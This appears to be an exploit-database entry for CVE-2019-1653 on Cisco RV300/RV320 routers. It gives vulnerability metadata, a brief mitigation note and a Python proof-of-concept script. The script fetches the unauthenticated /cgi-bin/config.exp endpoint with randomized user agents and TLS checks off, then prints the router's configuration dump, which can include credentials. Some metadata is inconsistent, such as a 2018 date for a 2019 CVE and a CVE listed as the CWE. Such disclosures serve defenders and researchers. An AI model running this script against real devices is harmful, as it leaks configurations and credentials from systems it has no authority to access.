6coRV Exploit

vendor:

RV300/RV320

by:

Harom Ramos [Horus]

7.5

CVSS

HIGH

CISCO CVE-2019-1653

CWE

Product Name: RV300/RV320

Affected Version From: RV300/RV320

Affected Version To: RV300/RV320

Patch Exists: YES

Related CWE: CVE-2019-1653

CPE: h:cisco:rv300_series_routers

Metasploit: https://www.rapid7.com/db/vulnerabilities/cisco-sa-20190123-rv-info/, https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv32x_rce/

Other Scripts: N/A

Platforms Tested: None

2018

This exploit is a proof of concept for the Cisco RV300/RV320 vulnerability CVE-2019-1653. It uses a python script to send a GET request to the target URL and check for the status code. If the status code is 200, it returns the text of the response.

Mitigation:

Cisco has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: 6coRV Exploit
# Date: 01-26-2018
# Exploit Author: Harom Ramos [Horus]
# Tested on: Cisco RV300/RV320
# CVE : CVE-2019-1653

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from fake_useragent import UserAgent

def random_headers():
    return dict({'user-agent': UserAgent().random})

def request(url):
    r = requests.Session()
    try:
        get =  r.get(url, headers = random_headers(), timeout = 5, verify=False)#, allow_redirects=False
        if get.status_code == 200:  
            return get.text    
    except requests.ConnectionError:
        return 'Error Conecting'
    except requests.Timeout:
	    return 'Error Timeout'
    except KeyboardInterrupt:
        raise    
    except:
        return 0

print("")        
print("##################################################")
print("CISCO CVE-2019-1653 POC")
print("From H. with love")
print("")

url = raw_input("URL> EX:http://url:port/ ") 
url = url + "/cgi-bin/config.exp"
print(request(url))